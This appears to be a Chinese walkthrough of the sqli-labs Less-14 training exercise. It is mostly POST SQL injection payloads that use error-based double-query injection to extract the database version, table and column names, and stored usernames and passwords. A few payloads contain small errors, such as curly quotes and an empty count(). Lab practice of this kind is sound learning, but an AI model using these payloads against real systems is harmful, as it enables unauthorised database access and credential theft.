sqli-labs Less-14

Less-14 POST -Double Injection -Single quotes - String -with twist
与Less-13只有闭合方式不同，都是通过双注入来破解。基本步骤一致。

0x01.

uname=1&passwd=1&submit=Submit

uname=1"&passwd=1&submit=Submit

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1" LIMIT 0,1' at line 1

通过报错语句可以知道用双引号闭合

0x02.获取数据库版本，数据库 以及用户
uname=" union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

0x03.获取表名
uname=" union select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=’security’ limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

查其他表，改变llimit值就可以

0x04.获取字段名
uname=" union select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

0x05.查看字段数
uname=" union select count(*),concat((select concat(count(),0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

0x06.获取字段值
uname=" union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

• 点赞
• 收藏
• 分享
• 文章举报